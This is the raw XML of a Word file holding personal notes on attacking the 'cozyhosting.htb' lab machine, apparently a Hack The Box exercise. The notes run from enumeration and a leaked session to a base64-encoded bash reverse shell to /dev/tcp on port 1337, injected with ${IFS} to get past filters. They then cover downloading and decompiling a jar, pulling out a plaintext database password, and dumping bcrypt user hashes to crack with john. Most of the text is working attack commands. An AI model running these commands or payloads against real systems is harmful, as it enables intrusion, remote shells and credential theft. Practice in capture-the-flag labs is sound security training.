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F190" w14:textId="10E2409E" w:rsidR="00B53C1D" w:rsidRDefault="00B53C1D">
      <w:r>
        <w:t>/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5A25F" w14:textId="4BA6C05B" w:rsidR="00D84E80" w:rsidRDefault="00D84E80">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="font-size24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="font-size24"/>
        </w:rPr>
        <w:t>Ip  cozyhosting.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E2FC9" w14:textId="21EC0BDC" w:rsidR="0085347D" w:rsidRDefault="0085347D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="font-size24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6156F8" w14:textId="1D4F4058" w:rsidR="0085347D" w:rsidRDefault="0085347D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="font-size24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="font-size24"/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE9B4E7" w14:textId="3909DF11" w:rsidR="0085347D" w:rsidRDefault="00001664">
      <w:r w:rsidRPr="00001664">
        <w:t xml:space="preserve">feroxbuster --url </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="006A776C" w:rsidRPr="00737C7C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cozyhosting.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E15052A" w14:textId="5888DC2F" w:rsidR="006A776C" w:rsidRDefault="006A776C">
      <w:r>
        <w:t>dirsearch workin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573E166" w14:textId="716918EA" w:rsidR="00D87EC4" w:rsidRDefault="00D87EC4">
      <w:r w:rsidRPr="00D87EC4">
        <w:t>http://cozyhosting.htb/actuator/sessions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4"/>
        <w:gridCol w:w="1183"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF5908" w:rsidRPr="00BF5908" w14:paraId="482801C1" w14:textId="77777777" w:rsidTr="00BF590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A6D469" w14:textId="77777777" w:rsidR="00BF5908" w:rsidRPr="00BF5908" w:rsidRDefault="00BF5908" w:rsidP="00BF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908">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>915D07E2D0FE449FFDF80E8197C9C2C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712F8C58" w14:textId="77777777" w:rsidR="00BF5908" w:rsidRPr="00BF5908" w:rsidRDefault="00BF5908" w:rsidP="00BF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908">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>"kanderson"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF5908" w:rsidRPr="00BF5908" w14:paraId="7970BE90" w14:textId="77777777" w:rsidTr="00BF5908">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A4C493F" w14:textId="77777777" w:rsidR="00BF5908" w:rsidRDefault="00BF5908" w:rsidP="00BF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726015" w14:textId="6ECA3873" w:rsidR="00A501CA" w:rsidRPr="00BF5908" w:rsidRDefault="00A501CA" w:rsidP="00BF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Echo $(IFS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DDCC4A4" w14:textId="77777777" w:rsidR="00BF5908" w:rsidRPr="00BF5908" w:rsidRDefault="00BF5908" w:rsidP="00BF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BBC105" w14:textId="4DFEA8E2" w:rsidR="006A776C" w:rsidRDefault="006A776C"/>
    <w:p w14:paraId="3DA1B8AC" w14:textId="00367EC5" w:rsidR="00252BB3" w:rsidRDefault="00252BB3"/>
    <w:p w14:paraId="45AA0EB4" w14:textId="4C9A47FE" w:rsidR="00252BB3" w:rsidRDefault="00DC1E25">
      <w:r w:rsidRPr="00DC1E25">
        <w:t xml:space="preserve">echo "bash -c 'exec bash -i &amp;&gt;/dev/tcp/10.10.14.140/1337 &lt;&amp;1'" | base64    </w:t>
      </w:r>
      <w:r w:rsidR="00345584">
        <w:t>-w 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1E25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D49EFA" w14:textId="28998F20" w:rsidR="00DC1E25" w:rsidRDefault="00331B61" w:rsidP="00331B61">
      <w:r w:rsidRPr="00331B61">
        <w:t>;echo${IFS}</w:t>
      </w:r>
      <w:r w:rsidR="006667E2" w:rsidRPr="006667E2">
        <w:t>YmFzaCAtYyBleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xMC4xMC4xNC44OC8xMzM3IDwmMQo=</w:t>
      </w:r>
      <w:r w:rsidRPr="00331B61">
        <w:t>|base64${IFS}-d|${IFS}bash;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26147B2B" w14:textId="426DE76B" w:rsidR="001C45B3" w:rsidRDefault="001C45B3" w:rsidP="00331B61">
      <w:r>
        <w:t>Download Jar file reader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3BDAED" w14:textId="2E6EA0C6" w:rsidR="00277379" w:rsidRDefault="00277379" w:rsidP="00331B61">
      <w:r w:rsidRPr="00277379">
        <w:t xml:space="preserve">python3 </w:t>
      </w:r>
      <w:r w:rsidR="00BC248F">
        <w:t xml:space="preserve">-m </w:t>
      </w:r>
      <w:r w:rsidRPr="00277379">
        <w:t>http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A8CE4" w14:textId="290310CC" w:rsidR="00B128D5" w:rsidRDefault="00B128D5" w:rsidP="00331B61">
      <w:r w:rsidRPr="00B128D5">
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000A2E8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.11.230:8000/cloudhosting-0.0.1.jar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (maijn linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A82E29" w14:textId="00521C12" w:rsidR="004A591E" w:rsidRDefault="004A591E" w:rsidP="00331B61">
      <w:r w:rsidRPr="004A591E">
        <w:t>jd-gui cloudhosting-0.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B9FE0" w14:textId="7E013D33" w:rsidR="008B1A98" w:rsidRDefault="008B1A98" w:rsidP="00331B61"/>
    <w:p w14:paraId="1095BA2D" w14:textId="7A6C87E6" w:rsidR="008B1A98" w:rsidRDefault="008B1A98" w:rsidP="00331B61">
      <w:r w:rsidRPr="008B1A98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0971C6" wp14:editId="64815AEC">
            <wp:extent cx="5943600" cy="2761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8F9F" w14:textId="1393B588" w:rsidR="0067117F" w:rsidRDefault="0067117F" w:rsidP="00671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900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ring.datasource.platform</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring.datasource.url</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jdbc:postgresql://localhost:5432/cozyhosting</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring.datasource.username</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring.datasource.password</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0067117F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="2900FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vg&amp;nvzAQ7XxR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A7E505" w14:textId="21C67FDE" w:rsidR="00B040B8" w:rsidRDefault="00B040B8" w:rsidP="00671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B040B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h 127.0.0.1 -U postgres  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DED4FC" w14:textId="77777777" w:rsidR="007F0220" w:rsidRDefault="001A72C7" w:rsidP="00671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1A72C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\c cozyhosting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (to connect change databses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572434AC" w14:textId="7E11A5CC" w:rsidR="001A72C7" w:rsidRPr="0067117F" w:rsidRDefault="007F0220" w:rsidP="00671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>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\d (list databases)</w:t>
      </w:r>
      <w:r w:rsidR="001A72C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B9229" w14:textId="79CD2579" w:rsidR="009913CB" w:rsidRDefault="009913CB" w:rsidP="00331B61">
      <w:r>
        <w:t>Select * from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D72BC5" w14:textId="77777777" w:rsidR="00333151" w:rsidRDefault="00333151" w:rsidP="00333151">
      <w:r>
        <w:t>kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E237D34" w14:textId="0E3DE164" w:rsidR="00333151" w:rsidRDefault="00333151" w:rsidP="00333151">
      <w:r>
        <w:t xml:space="preserve"> admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC647C" w14:textId="023680E0" w:rsidR="00FF58EA" w:rsidRDefault="00FF58EA" w:rsidP="00333151">
      <w:r>
        <w:t>john hash</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FF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BB"/>
    <w:rsid w:val="00001664"/>
    <w:rsid w:val="001A72C7"/>
    <w:rsid w:val="001C45B3"/>
    <w:rsid w:val="00252BB3"/>
    <w:rsid w:val="00277379"/>
    <w:rsid w:val="00331B61"/>
    <w:rsid w:val="00333151"/>
    <w:rsid w:val="00345584"/>
    <w:rsid w:val="004A591E"/>
    <w:rsid w:val="005E304A"/>
    <w:rsid w:val="006667E2"/>
    <w:rsid w:val="0067117F"/>
    <w:rsid w:val="006A776C"/>
    <w:rsid w:val="007C6858"/>
    <w:rsid w:val="007F0220"/>
    <w:rsid w:val="008502EF"/>
    <w:rsid w:val="0085347D"/>
    <w:rsid w:val="00896BCF"/>
    <w:rsid w:val="008B1A98"/>
    <w:rsid w:val="008F663D"/>
    <w:rsid w:val="009913CB"/>
    <w:rsid w:val="00A501CA"/>
    <w:rsid w:val="00AC7EBB"/>
    <w:rsid w:val="00B040B8"/>
    <w:rsid w:val="00B04AF4"/>
    <w:rsid w:val="00B128D5"/>
    <w:rsid w:val="00B53C1D"/>
    <w:rsid w:val="00BC248F"/>
    <w:rsid w:val="00BF5908"/>
    <w:rsid w:val="00D84E80"/>
    <w:rsid w:val="00D87EC4"/>
    <w:rsid w:val="00DC1E25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0B43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{37B5262B-BA63-4D63-8BCE-9BF7267F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-size24">
    <w:name w:val="font-size24"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D84E80"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A7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76C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="treelabel">
    <w:name w:val="treelabel"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BF5908"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="objectbox">
    <w:name w:val="objectbox"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BF59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1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.10.11.230:8000/cloudhosting-0.0.1.jar" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cozyhosting.ht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2023-12-07T16:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-23T14:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>